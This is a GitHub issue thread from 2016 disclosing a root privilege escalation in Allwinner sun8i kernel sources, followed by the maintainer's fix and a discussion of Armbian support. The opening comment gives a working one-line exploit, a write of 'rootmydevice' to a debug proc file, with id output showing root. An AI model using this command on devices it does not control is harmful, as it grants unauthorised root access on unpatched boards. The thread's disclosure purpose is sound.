Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Local privileges escalation #1

Closed
ThomasKaiser opened this issue Apr 30, 2016 · 8 comments
Closed

Local privileges escalation #1

ThomasKaiser opened this issue Apr 30, 2016 · 8 comments

Comments

@ThomasKaiser
Copy link

ThomasKaiser commented Apr 30, 2016
edited

Seems like Allwinner's sun8i kernel sources allow everyone to become root easily:

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)

Please check and fix if you're affected too.
@wuweidong0107
Copy link
Contributor

Thank you very much. See commit 5d4d02b. Looking forward to more feedback.

@ThomasKaiser
Copy link
Author

Thx for the fast reaction. But to protect your users OS images should be updated too, shouldn't they? Or at least people informed that by setting permissions to 000 from within /etc/rc.local a workaround exists.

BTW: We fully support M1 so maybe it's also a good idea to point your users to Armbian? http://www.armbian.com/nanopi-m1/

@wuweidong0107
Copy link
Contributor

Wow, you are a hero.We will update our ROMs & let our customer enjoy armbian as soon as possible.

@ThomasKaiser
Copy link
Author

You're welcome! Please keep in mind that I added support solely based on contents of fex file from your Github repo. If settings there are correct then it should work perfectly since the only real change compared to some Oranges is blue vs. red led.

To be able to fully support the board (inclusive camera) it might be worth the efforts to send a developer sample to Igor. Address valid using whois igorpecovnik.com

@ThomasKaiser
Copy link
Author

And just a small note in case you didn't noticed yet. You can use/promote my RPi-Monitor installer for H3 as well as our h3disp utility to provide simple HDMI display adjustments (might require changes to find script.bin if not the usual locations are used).

@wuweidong0107
Copy link
Contributor

Hey Thomas, we've tried armbian and will release its details on our wiki shortly.
BTW, we prefer "root@nanopi-M1:#" rather than "root@orangepione:#"...

@ThomasKaiser
Copy link
Author

Oops, sorry. This is just another drawback of our (failed) auto detection approach we invented when we started supporting H3 boards a few months back. We will fix that most probably with next release when we create again for every single board an own image (now we create one for all Fast Ethernet equipped H3 boards and one for those with GbE -- but this does not work reliably). We wanted to fix that prior to 5.10 but it got postponed for several reasons :(

@ThomasKaiser
Copy link
Author

Just FYI: http://forum.armbian.com/index.php/topic/1015-nanopi-m1/?view=getlastpost

@ForrestHong ForrestHong mentioned this issue Jun 7, 2018
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@wuweidong0107 @ThomasKaiser